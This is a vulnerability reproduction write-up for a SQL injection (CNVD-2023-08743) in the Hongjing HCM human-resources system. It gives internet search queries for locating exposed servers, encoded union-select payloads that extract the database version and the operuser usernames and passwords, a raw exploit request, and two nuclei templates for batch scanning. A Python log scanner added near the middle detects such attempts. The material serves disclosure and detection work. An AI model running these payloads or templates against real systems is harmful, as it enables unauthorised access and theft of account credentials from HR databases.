Hongjing HCM SQL Injection Vulnerability Reproduction (CNVD-2023-08743)
Vulnerability Overview
Hongjing HCM contains a SQL injection vulnerability. An unauthenticated remote attacker can exploit it to execute arbitrary SQL statements and thereby steal sensitive information from the database.
Affected Versions
Hongjing HCM < 8.2
Reproduction
FOFA query: body='<div class="hj-hy-all-one-logo"'
Hunter (鹰图) query: app.name="宏景 HCM"
POC (the injection point is the categories parameter):
/servlet/codesettree?categories=[encoded malicious SQL]&codesetid=1&flag=c&parentid=-1&status=1
Note: the SQL statement must first be encoded in the form the HRMS servlet expects (the ~XX hex form seen in the payloads below).
Tool: https://github.com/vaycore/HrmsTool
java -jar HrmsTool.jar -e "1' union all select 'hongjing',@@version--"
Constructed payload (queries the database version):
GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Verification POCs:
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cpassword~20from~20operuser~20~2d~2d
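From the defender's side, the most useful thing to have is a check that can find exploitation attempts for this vulnerability in existing web server logs. The following is an added example, not part of the original write-up and not code from HrmsTool: it parses combined-format access log lines (the log format and the sample lines are constructed here), undoes the ~XX hex encoding that the codesettree servlet applies to the categories parameter, and flags any decoded value that breaks out of the string literal and appends SQL. A legitimate value such as ~31 decodes to "1" and is not flagged.

```python
"""Detect CNVD-2023-08743 exploitation attempts in web server access logs.

Added example (not part of the original write-up or of HrmsTool). It decodes
the ~XX hex encoding that the codesettree servlet applies to the `categories`
parameter and flags decoded values that contain SQL injection markers. The
log format and the sample lines below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/Nginx combined-log style: one benign
# request, two requests mirroring the POCs above, and one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2023:10:00:01 +0800] "GET /servlet/codesettree?categories=~31&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jun/2023:10:00:02 +0800] "GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1" 200 734
10.0.0.9 - - [01/Jun/2023:10:00:03 +0800] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jun/2023:10:00:04 +0800] "GET /index.jsp HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TILDE_RE = re.compile(r"~([0-9a-fA-F]{2})")
# A decoded value that closes the string literal and continues with a SQL
# keyword, or carries a comment sequence, is treated as an injection attempt.
SQLI_RE = re.compile(r"'\s*(union|select|or|and)\b|--|/\*", re.IGNORECASE)


def decode_hrms(value: str) -> str:
    """Undo the ~XX encoding: each ~XX is one byte written as two hex digits.

    Characters that are not part of a ~XX sequence are kept as they are.
    """
    out = bytearray()
    i = 0
    while i < len(value):
        m = TILDE_RE.match(value, i)
        if m:
            out.append(int(m.group(1), 16))
            i = m.end()
        else:
            out.extend(value[i].encode("utf-8"))
            i += 1
    return out.decode("utf-8", errors="replace")


def scan_log(text: str) -> list:
    """Return one finding per request whose decoded categories value looks like SQLi."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/servlet/codesettree"):
            continue
        # parse_qs percent-decodes the value; the ~XX layer is decoded separately.
        for raw in parse_qs(url.query).get("categories", []):
            decoded = decode_hrms(raw)
            if SQLI_RE.search(decoded):
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": m.group("status"),
                    "decoded": decoded,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} categories={f['decoded']!r}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. A 200 response with Content-Type text/xml on a flagged request (the same signals both nuclei templates below match on) is the strongest indication that the injection actually succeeded, so the status code is kept in each finding.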
Nuclei YAML templates for batch scanning
id: hongjing_HCM_codesettree_sqli
info:
  name: 宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
  author: mhb17
  severity: high
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |+
        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
        Host: {{Hostname}}
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ' <TreeNode id="1"'
      - type: word
        part: header
        words:
          - 'Content-Type: text/xml'
      - type: word
        part: header
        words:
          - '200'
A second template for the same vulnerability, using the version-query payload and DSL matchers:
id: CNVD-2023-08743

info:
  name: Hongjing Human Resource Management System - SQL Injection
  author: SleepingBag945
  severity: critical
  description: There is a SQL injection vulnerability in the categories parameter of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.
  reference:
    - https://www.henry4e36.top/index.php/archives/162.html
    - https://blog.csdn.net/qq_41904294/article/details/130944159
  metadata:
    max-request: 1
    verified: true
    fofa-query: title="人力资源信息管理系统"
  tags: cnvd,cnvd2023,hongjing,hcm

http:
  - raw:
      - |
        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header,"text/xml")'
          - 'contains_all(body,"TreeNode id=\"hongjing","SQL Server")'
        condition: and